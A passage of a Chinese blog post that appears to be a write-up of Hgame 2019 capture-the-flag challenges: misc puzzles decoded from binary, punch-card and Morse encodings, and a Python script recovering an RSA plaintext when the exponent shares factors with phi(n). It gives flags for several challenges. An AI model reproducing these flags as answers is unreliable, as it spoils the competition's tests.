<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">01101000 01100111 01100001 01101101 01100101 01111011 01000001 01110100 01011111 01001100 01100101 01100001 00110101 01110100 01011111 01001100 00110001 01101011 01100101 01011111 01110100 01001000 01100001 01110100 01011111 01110011 01101110 00110000 01110111 01111101</span><br></pre></td></tr></table></figure>

<p>转文本，就得到了flag。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">hgame&#123;At_Lea5t_L1ke_tHat_sn0w&#125;</span><br></pre></td></tr></table></figure>



<h2 id="旧时记忆"><a href="#旧时记忆" class="headerlink" title="旧时记忆"></a>旧时记忆</h2><blockquote>
<p>Description<br>愉快的送（nao）分（dong）题，大家一起来学历史吧，结果加上hgame{}（字母均为大写）<br>hint:memory<br>又一个hint:存储器<br>URL <a target="_blank" rel="noopener" href="http://plqfgjy5a.bkt.clouddn.com/%E6%97%A7%E6%97%B6%E8%AE%B0%E5%BF%86.jpg">http://plqfgjy5a.bkt.clouddn.com/%E6%97%A7%E6%97%B6%E8%AE%B0%E5%BF%86.jpg</a></p>
</blockquote>
<p><img src="https://i.loli.net/2019/02/23/5c70b0a351add.jpg"></p>
<p>在给出hint之后，结合题目，旧时记忆，想到最初计算机用于存储数据（记忆）的工具，打孔卡，于是就google到了相关的信息：</p>
<blockquote>
<ul>
<li>数字通过在行0至行9直接打1个孔来表示。</li>
<li>空格符的表示，不需要打孔。</li>
<li>字母用2个孔表示：一个孔在第11、第12、第0行；另一个孔在第1至第9行。字母表被依次分为由9个字母组成的区（”zones”），每个区的字母依次在第1至第9行打孔。每个区分别在第11、第12、第0行打孔。第3区第1个字符保留未使用。（如在（11,3）则为1*9+3 = 12（L））</li>
<li>一些特殊字符使用了额外的单孔表示，或者双孔表示。</li>
<li>大多数特殊字符（如标点符号等）用3孔表示：第8行被穿孔；第0、第11、第12行有1个穿孔；第1到第7行有1个穿孔。第9行保留未使用</li>
</ul>
</blockquote>
<p>根据这个，一一对照，得出flag。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">0LD_DAY5%M3MORY</span><br></pre></td></tr></table></figure>



<h2 id="听听音乐？"><a href="#听听音乐？" class="headerlink" title="听听音乐？"></a>听听音乐？</h2><blockquote>
<p>Description<br>一首MP3,好好听哦，flag由大写英文字母、数字以及下划线组成，记得添加hgame{}<br>URL <a target="_blank" rel="noopener" href="http://plir4axuz.bkt.clouddn.com/hgame2019/a80509c91f30027ca21b069e7d94fa7718ab2e40684628c41943bf647f3d7c6a/stego.mp3">http://plir4axuz.bkt.clouddn.com/hgame2019/a80509c91f30027ca21b069e7d94fa7718ab2e40684628c41943bf647f3d7c6a/stego.mp3</a></p>
</blockquote>
<p><code>audacity</code>打开看波形，类似莫斯电码：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">..-. .-.. .- --. ---... .---- - ..--.- .--- ..- ..... - ..--.- ....- ..--.- . .- ... -.-- ..--.- .-- .- ...-</span><br><span class="line"></span><br><span class="line">FLAG:1T_JU5T_4_EASY_WAV</span><br></pre></td></tr></table></figure>



<h1 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h1><h2 id="P4ndd-n"><a href="#P4ndd-n" class="headerlink" title="P4ndd!n@!"></a>P4ndd!n@!</h2><blockquote>
<p>Description<br>Aris跑了过来 嘴里大喊”CBC!” 并递给了我一张纸条<br>lpFsOPZm9UztVP30SHertuXoWkOEP4Ij7UcjGM1xvFIw78Ti15UwL9YY0xn4syBxW/2BgzRtsZHGksUmWgfr5Q==(参数要用base64编码一发)<br>hint: padding oracle<br>URL <a target="_blank" rel="noopener" href="http://47.95.212.185:23450/padding?text=">http://47.95.212.185:23450/padding?text=</a></p>
</blockquote>
<h2 id="babyRSA"><a href="#babyRSA" class="headerlink" title="babyRSA"></a>babyRSA</h2><blockquote>
<p>Description<br>e = 12<br>p = 58380004430307803367806996460773123603790305789098384488952056206615768274527<br>q = 81859526975720060649380098193671612801200505029127076539457680155487669622867<br>ciphertext = 206087215323690202467878926681944491769659156726458690815919286163630886447291570510196171585626143608988384615185921752409380788006476576337410136447460</p>
<p>算出的m转化成字符串<br>URL <a target="_blank" rel="noopener" href="http://example.com/">http://example.com/</a></p>
</blockquote>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#-*- coding:utf-8 -*-</span></span><br><span class="line"><span class="comment"># 当指数e和Phi(n)不互素时</span></span><br><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> sympy</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">gcd</span>(<span class="params">a,b</span>):</span></span><br><span class="line">    <span class="keyword">if</span> a &lt; b:</span><br><span class="line">        a,b = b,a</span><br><span class="line">    <span class="keyword">while</span> b != <span class="number">0</span>:</span><br><span class="line">        tem = a % b</span><br><span class="line">        a = b</span><br><span class="line">        b = tem</span><br><span class="line">    <span class="keyword">return</span> a</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">invalidExponent</span>(<span class="params">p,q,e,c</span>):</span></span><br><span class="line">    phiN = (p - <span class="number">1</span>) * (q - <span class="number">1</span>)</span><br><span class="line">    n = p * q</span><br><span class="line">    GCD = gcd(e, phiN)</span><br><span class="line">    <span class="keyword">if</span> (GCD == <span class="number">1</span>):</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Public exponent is valid.....&quot;</span></span><br><span class="line">    d = inverse(e//GCD,phiN)</span><br><span class="line">    c = pow(c, d, n)</span><br><span class="line">    plaintext = sympy.root(c, GCD)</span><br><span class="line">    plaintext = long_to_bytes(plaintext)</span><br><span class="line">    <span class="keyword">return</span> plaintext</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span>():</span></span><br><span class="line">    p = <span class="number">58380004430307803367806996460773123603790305789098384488952056206615768274527</span></span><br><span class="line">    q = <span class="number">81859526975720060649380098193671612801200505029127076539457680155487669622867</span></span><br><span class="line">    e = <span class="number">12</span></span><br><span class="line">    c = <span class="number">206087215323690202467878926681944491769659156726458690815919286163630886447291570510196171585626143608988384615185921752409380788006476576337410136447460</span></span><br><span class="line"></span><br><span class="line">    plaintext = invalidExponent(p,q,e,c)</span><br><span class="line">    <span class="keyword">print</span> plaintext</span><br><span class="line"></span><br><span class="line">main()</span><br></pre></td></tr></table></figure>



<h2 id="basicmath"><a href="#basicmath" class="headerlink" title="basicmath"></a>basicmath</h2><blockquote>
<p>Description<br>hint: 二次剩余的求解<br>URL <a target="_blank" rel="noopener" href="http://plir4axuz.bkt.clouddn.com/hgame2019/0b206d5e4fc12dab4961cc5376fbc856f64331976359d30ff1c11668de11a6f0/Crypto2.py">http://plir4axuz.bkt.clouddn.com/hgame2019/0b206d5e4fc12dab4961cc5376fbc856f64331976359d30ff1c11668de11a6f0/Crypto2.py</a></p>
</blockquote>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:v0wldl@163.com">V0WKeep3r</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://v0w.top/2019/02/15/week3-WP/">http://v0w.top/2019/02/15/week3-WP/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://v0w.top">V0W's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/RCE/">RCE</a><a class="post-meta__tags" href="/tags/XSS/">XSS</a><a class="post-meta__tags" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">文件上传</a></div><div class="post-qr-code"><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/AlipayQR.png"><div class="post-qr-code__desc">支付宝打赏</div></div><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/wechatQR.png"><div class="post-qr-code__desc">微信打赏</div></div></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2019/02/23/Hgame2019-week4/"><i class="fa fa-chevron-left">  </i><span>杭电Hgame2019-week4-WP</span></a></div><div class="next-post pull-right"><a href="/2019/02/10/Hgame2019-week2WP/"><span>杭电Hgame2019-week2-WP</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == 'true';
var verify = 'false' == 'true';
var record_ip = 'false' == 'true';
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  recordIP:record_ip,
  appId:'xuqLRcah5FaInOgKRdj9JB3V-gzGzoHsz',
  appKey:'8vMPXnFoh7Fih1g29jw4JNxl',
  placeholder:'师傅可以留下你的评论和邮箱，V0W能够通过邮件get并回复哦～',
  avatar:'retro',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(/img/index.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2020 By V0WKeep3r</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>